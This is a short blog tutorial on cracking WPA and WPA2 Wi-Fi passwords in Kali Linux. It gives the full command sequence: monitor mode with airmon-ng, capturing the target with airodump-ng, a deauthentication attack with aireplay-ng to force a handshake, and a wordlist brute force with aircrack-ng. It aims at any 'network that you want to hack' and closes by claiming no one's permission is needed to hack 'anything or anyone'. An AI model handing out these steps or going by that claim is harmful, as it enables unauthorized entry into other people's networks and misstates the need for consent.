How To Hack Wifi - WPA & WPA2 Network In Kali Linux Using airodump-ng and aircrack


Cracking wep is pretty much easy compared to cracking wpa wap2 passwords. Here is a tutorial on how to hack WPA & WPA2 passwords in Kali Linux. We are going to brute force the wifi password using a wordlist and handshake created by airodump and airreplay-ng


Requirements:
1)  Kali Linux Operating System In Your System Or Live Boot --> Click Here To Know How To Make Kali Live Boot


Hacking WPA & WPA2 Network In Kali Linux Using airodump-ng and aircrack




Airmon-ng start wlan0



type "Airodump-ng mon0" --> wait for your network adapter to search for available networks around you.



Copy the MAC address or the BSSID of the network that you want to hack. 



Type "airodump-ng -w anything --bssid MAC_Address mon0 -c Channel_number"


In another terminal type "aireplay-ng --deauth 1 -a MAC_Address mon0"




Wait until you capture the handshake file. handshake file will be created in the /Home directory.

Brute forcing the router: 

aircrack-ng -w "location of the wordlist/wordlist.txt" handshakefile.cap

brute forcing of the wifi router starts and after sometime, you may get the password. 








=============     Hacking Don't Need Agreements     ============
Just Remember One Thing You Don't Need To Seek Anyone's  To Hack Anything Or Anyone As Long As It Is Ethical, This Is The Main Principle Of Hacking Dream
                           Thank You for Reading, Hope It's Useful 

I Will Be Very Happy To Help You So For Queries or Any Problem Comment Below Or You Can Mail Me At Bhanu@HackingDream.netom


Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment